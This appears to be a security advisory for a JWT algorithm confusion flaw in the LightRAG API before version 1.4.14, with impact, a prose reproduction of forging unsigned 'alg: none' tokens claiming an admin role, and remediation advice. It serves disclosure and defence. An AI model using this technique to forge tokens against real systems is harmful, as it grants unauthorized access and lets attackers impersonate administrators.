LightRAG JWT Algorithm Confusion Vulnerability Allowing Token Forgery and Unauthorized Access

A JWT algorithm confusion vulnerability has been identified in the LightRAG API, prior to version 1.4.14. This issue allows an attacker to forge tokens by specifying 'alg': 'none' in the JWT header. The vulnerability arises because the jwt.decode() function does not explicitly reject the 'none' algorithm, enabling crafted tokens without signatures to be accepted as valid. As a result, attackers can gain unauthorized access to protected resources.

Impact

Exploitation of this vulnerability allows attackers to impersonate any user, including administrators, by forging JWTs with 'alg': 'none'. This grants full access to protected resources without valid credentials.

Reproduction

To reproduce this vulnerability, generate a JWT with the 'alg' header set to 'none' and include a payload that specifies a valid user role, such as 'admin'. Then, send a request to a protected endpoint, including the forged JWT in the Authorization header as a Bearer token. The request will be accepted, and access to the protected resource will be granted, demonstrating the vulnerability.

Remediation

Users are advised to update to LightRAG version 1.4.14 or later. Additionally, when implementing JWT validation, explicitly specify allowed algorithms and exclude 'none'.